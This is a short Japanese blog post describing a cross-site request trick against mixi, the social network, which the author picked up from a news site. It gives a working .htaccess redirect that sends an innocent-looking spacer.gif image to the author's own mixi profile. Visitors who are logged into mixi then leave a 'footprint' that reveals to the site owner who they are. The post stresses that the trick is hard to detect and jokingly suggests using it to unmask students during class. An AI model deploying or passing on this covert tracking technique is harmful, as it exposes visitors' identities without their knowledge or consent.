CSRF?

こんなことしてる時間はないが,やじうまWatchでおもしろい技を見つけてしまった。mixi足あとちょうを、さらにバレにくくする :: ぼくはまちちゃん!参照。mixiにログインしている状態で他の人のmixiのページを見ると「足あと」が残る(誰が見たか記録に残る)。これを利用して,mixiと関係ないサイトでも .htaccess とかに

Redirect 302 /spacer.gif http://mixi.jp/show_friend.pl?id=自分のmixiのid

とか書いておき,さりげなくspacer.gifを使うと,誰が自分のサイトを訪れたかわかる。ソースを見られてもばれにくい。

これを使えば授業中mixiにログインして遊んでいる者がわかるぞ!